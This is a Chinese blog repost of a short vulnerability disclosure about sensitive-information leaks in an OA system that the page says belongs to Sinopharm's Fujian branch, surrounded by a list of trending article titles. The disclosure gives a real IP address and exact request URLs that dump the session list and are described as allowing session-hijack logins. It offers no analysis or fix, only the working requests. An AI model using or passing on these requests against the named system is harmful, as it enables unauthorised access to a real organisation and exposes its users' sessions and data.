热门标签
热门文章
- 1【ARMv9 DSU-120 系列 6.1 -- PPU power and reset control】_arm ppu
- 2JS防抖和节流详解_js 节流
- 3使用git clone命令出现error: RPC failed; curl 18 transfer closed with outstanding read data remaining问题_tortoisegit git clone 拉取项目时报错 rpc failed; curl 18
- 4你知道RocketMQ消息队列吗?_rocketmq默认队列
- 5【K哥爬虫普法】某博士爬虫团伙贩卖个人信息,被一网打尽!
- 6网络安全最全微服务高并发秒杀实战_基于令牌桶实现库存(2),2024年最新掌握这些知识点再也不怕面试通不过
- 7客户端Nacos的安装,启动,及在IDEA中属性相关配置,与Eureka的相关属性配置_idea nacos配置
- 82024 应届校招经验分享(互联网篇)_互联网校招
- 9lda主题模型困惑度_nlp中的主题模型
- 10数据结构——二叉树的遍历及应用_以二叉链表作为二叉树的存储结构,编写以下算法: (1)输出二叉树的先序遍历序列、中
当前位置: article > 正文
【漏洞学习——敏感信息泄露】国药集团福建某系统多处敏感信息泄露_信息泄露漏洞、信息泄露漏洞实战、信息泄露漏洞渗透、信息泄露漏洞技巧、信息泄露
作者:weixin_40725706 | 2024-06-16 12:30:06
赞
踩
信息泄露漏洞、信息泄露漏洞实战、信息泄露漏洞渗透、信息泄露漏洞技巧、信息泄露
漏洞细节
多处敏感信息泄露
国药福建OA系统:http://218.5.65.215:8080/yyoa/
session泄露:
http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll
session劫持登陆:
http://218.5.65.215:8080/yyoa/assess/js/initDataAssess.jsp
http://218.5.65.215:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/726647
推荐阅读
相关标签
